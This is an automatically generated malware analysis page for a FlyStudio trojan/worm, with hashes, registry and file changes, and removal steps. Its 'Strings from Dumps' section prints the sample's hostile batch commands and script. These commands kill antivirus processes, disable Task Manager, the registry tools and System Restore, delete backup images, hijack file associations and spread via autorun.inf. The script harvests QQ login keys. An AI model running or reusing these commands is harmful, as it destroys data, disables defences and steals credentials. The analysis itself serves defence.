Trojan.Win32.FlyStudio_0a9ae60a15

by malwarelabrobot on May 30th, 2014 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Generic.Malware.SFMDYBVd.B6FAF71C (B) (Emsisoft), Generic.Malware.SFMDYBVd.B6FAF71C (AdAware), Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm, WormAutorun


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: 0a9ae60a1507dc9b0141dcb01ee413f6
SHA1: 296c491c9a00b5c9f4e825b6e2e3ecb2994cb742
SHA256: 8ce272c3e085a9f8da14abc2f56747ec9e50b771a2471e8c5e80cc664ec2e092
SSDeep: 6144:Zq9Eypeh23JV66dr1p VOWliICbpJouNjbb1FSEBqVg88GqgQxY8oEpeb:Q9N3JV6kr1cVOWdCLFfXf88GqgQxgEp
Size: 304640 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: AirInstaller
Created at: 2013-08-20 20:07:35
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

EmailWorm: Worm can send e-mails.
WormAutorun: A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:1808

File activity

The process %original file name%.exe:1808 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\slear.exe (1425 bytes)

Registry activity

The process %original file name%.exe:1808 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A AD 27 89 AD 3E 4B 95 FA C7 91 0A 48 3B 37 B5"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"slear.exe" = "c:\windows\system32\slear.exe"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.

VersionInfo

Company Name: 2013????
Product Name: ??????
Product Version: 1.6.0.0
Legal Copyright: 2013???? ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.6.0.0
File Description: 2013
Comments: ??????????(http://www.eyuyan.com)
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 651264 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 655360 290816 287232 5.49421 5f1aeacec80e299b97a3c0be6a619a2c
.rsrc 946176 16384 16384 2.49987 e2784112b04c223b0d25494fb365f9a9

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
caf03e9cc3118627cd7c3d133a311224

URLs

No activity has been detected.

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

Web Traffic was not found.

The Trojan connects to the servers at the following location(s):

Strings from Dumps

%original file name%.exe_1808:

atl.dll
wininet.dll
kernel32.dll
advapi32.dll
NTDLL.DLL
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
sleartest.exe
dll.bat
\*.dll
exe.bat
\*.exe
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&clientkey=
http://ptlogin2.qq.com/jump?clientuin=
http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
skey=
#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm
qzreferrer=http://user.qzone.qq.com/
http://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=
http://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=
http://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
SSOAxCtrlForPTLogin.SSOForPTLogin2
http://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
http://
len = str.length; i < len; ++i) hash += (hash << 5) + str.charCodeAt(i);
var t = QZONE.FormSender;
if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {
var a = QZFL.string.trim(fm.action);
a += (a.indexOf("?") > -1 ? "&": "?") + "g_tk=" + QZFL.pluginsDefine.getACSRFToken();
fm.action = a
slear && del / f / s / q c:\slear.bat
c:\slear.bat
cmd.exe
c:\windows\system\shutdown.bat
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slear.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"
del :\forshotdown.cmd
shutdown -s -t 0 && del / f / s / q c:\slear.bat
c:\windows\system32\slear.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
http://www.shafou.com
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat +r +s +h
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
%s% /im norton* /f >nul
%s% /im av* /f >nul
%s% /im fire* /f >nul
%s% /im anti* /f >nul
%s% /im spy* /f >nul
%s% /im bullguard /f >nul
%s% /im PersFw /f >nul
%s% /im KAV* /f >nul
%s% /im ZONEALARM /f >nul
%s% /im SAFEWEB /f >nul
%s% /im OUTPOST /f >nul
%s% /im nv* /f >nul
%s% /im nav* /f >nul
%s% /im F-* /f >nul
%s% /im ESAFE /f >nul
%s% /im cle /f >nul
%s% /im BLACKICE /f >nul
%s% /im def* /f >nul
%s% /im 360safe.exe /f >nul
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d
for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul
echo @echo off >d:\setup.bat
!^.^ >>d:\setup.bat
echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\
\a.bat >>d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
/f >>d:\setup.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat
echo [windows] >> %windir%\win.ini
echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini
echo [AutoRun] >d:\autorun.inf
echo Open=setup.bat >>d:\autorun.inf
echo Open=system.bat >>d:\autorun.inf
attrib d:\autorun.inf +r +s +h >>d:\setup.bat
attrib d:\setup.bat +r +s +h >>d:\setup.bat
start d:\setup.bat /min >nul
echo @echo off >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d
/f >>C:\AUTOEXEC.BAT
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT
copy %0 %systemroot%\windows.bat >nul
if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat
if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
attrib %windir%/system32/explorer.bat +r +s +h
attrib %systemroot%/windows.bat +r +s +h
for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat
for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat
for %%c in (%alldrive%) do echo attrib system.bat +r +s +h >>%%c:\system.bat
for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf
for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf
copy %0 d:\Program" "Files\run.bat
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min
>>%%c:\system.bat
for %%c in (%alldrive%) do attrib autorun.inf +r +s +h >>%%c:\system.bat
for %%c in (%alldrive%) do attrib %%c:\autorun.inf +r +s +h >nul
for %%c in (%alldrive%) do attrib %%c:\system.bat +r +s +h >nul
if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat
attrib d:\Program" "Files\run.bat +r +s +h >nul
http://www.hackbase.com/subject/2009-09-21/16408.html
c:\kill.bat
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
SOFTWARE\360Safe\safemon\ExecAccess
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
Software\Policies\Microsoft\Windows\System\DisableCMD
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
assoc .exe=nullfile
assoc .reg=nullfile
assoc .bat=nullfile
assoc .cmd=nullfile
assoc .vbs=nullfile
assoc .txt=nullfile
assoc .com=nullfile
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks" /f
reg delete "HKEY_CLASSES_ROOT\bluestacks" /f
reg delete "HKEY_CLASSES_ROOT\BlueStacks.Apk" /f
@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /f
c:\guanlian.bat
goto 22
c:\slears.bat
.slear
d:\sleartest.exe
adm-music.com
c:\windows\system32\
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
user32.dll
iphlpapi.dll
SHLWAPI.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
www.dywt.com.cn
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
GetCPInfo
WinExec
GetProcessHeap
RegOpenKeyExA
RegCreateKeyA
RegDeleteKeyA
RegCreateKeyExA
RegCloseKey
GetViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
ShellExecuteA
GetKeyState
SetWindowsHookExA
GetKeyboardLayout
VkKeyScanExA
keybd_event
CreateDialogIndirectParamA
UnhookWindowsHookEx
.text
`.rdata
@.data
.rsrc
PAD
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
ole32.dll
OLEAUT32.dll
RASAPI32.dll
SHELL32.dll
USER32.dll
WININET.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
(*.*)
1.6.0.0
(http://www.eyuyan.com)


Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %System%\slear.exe (1425 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "slear.exe" = "c:\windows\system32\slear.exe"

  5. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
